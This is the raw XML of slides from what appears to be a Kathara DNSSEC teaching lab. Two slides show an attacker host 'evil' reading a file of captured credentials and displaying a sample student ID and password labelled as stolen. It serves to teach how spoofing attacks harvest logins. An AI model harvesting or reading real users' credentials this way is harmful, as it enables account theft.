                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B282228-8DBE-E5E0-7A4E-7E661FFC35D9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE6A744F-EE79-54DC-0441-CE7FA8E8248A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAFD4216-CD36-B242-9DD6-8636091192E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33FC1AB7-99EB-3D75-680E-878D94598C28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C739FA0-9425-318A-148B-FA893B1FD200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{358A07E0-563D-07EC-9C51-43FFDBA87FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822" cy="371513"/>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endParaRPr lang="en-US" sz="1800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6BA3F02-8626-6D35-783B-5C0629EB33B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8452921" y="3948035"/>
            <a:ext cx="3594494" cy="521513"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -67701"/>
              <a:gd name="adj2" fmla="val -191490"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>view the hacker's database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18326775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A5C2FD-54EF-C774-F359-291217D25C97}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="34" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{812334DF-4375-62CB-1DF0-20DEE233B322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="987993" y="2668276"/>
            <a:ext cx="10216014" cy="1521448"/>
            <a:chOff x="1364266" y="2378845"/>
            <a:chExt cx="10216014" cy="1521448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E939E763-F53D-60D6-F674-8AF34B837C05}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2668294"/>
              <a:ext cx="10216014" cy="1231999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cat /var/www/html/captured_creds.txt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>--- CAPTURE ---</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Id Student: 500500 | Password: Gatto26!</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B95887D-DCA9-2907-2A1C-93E38D3F1E5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1364266" y="2378845"/>
              <a:ext cx="10216014" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>evil</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B4C88E-62C6-D6D7-56AD-33DBC3925C4B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EFB472E-7CD0-2306-C6F3-802E9F69C2B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47B04A0D-9716-4B2A-21B7-8FF00F059525}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{770312D3-7202-A890-FFEF-2118872572E2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDA28FD-1349-900D-3C4E-8C72EBC8CDB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>view hacker database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABCAF517-72B0-E206-BFCF-FA694925C3AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FE98BD-22A7-13CD-B655-EA0591A23E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508" name="Rectangle 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED234520-A57D-F10E-F73E-9F875B7F7C6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="6434123"/>
            <a:ext cx="181822" cy="371513"/>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endParaRPr lang="en-US" sz="1800" noProof="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52727FF2-8C5A-DEF1-FF68-9C45885CE8E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7609513" y="4314433"/>
            <a:ext cx="3594494" cy="778851"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -86863"/>
              <a:gd name="adj2" fmla="val -121432"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>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0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>credentials stolen from the student</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110992822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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B36BE0-8D70-45AF-F6E6-919D34A359B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{786B326D-D341-DF7E-A46A-768E09E0CAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
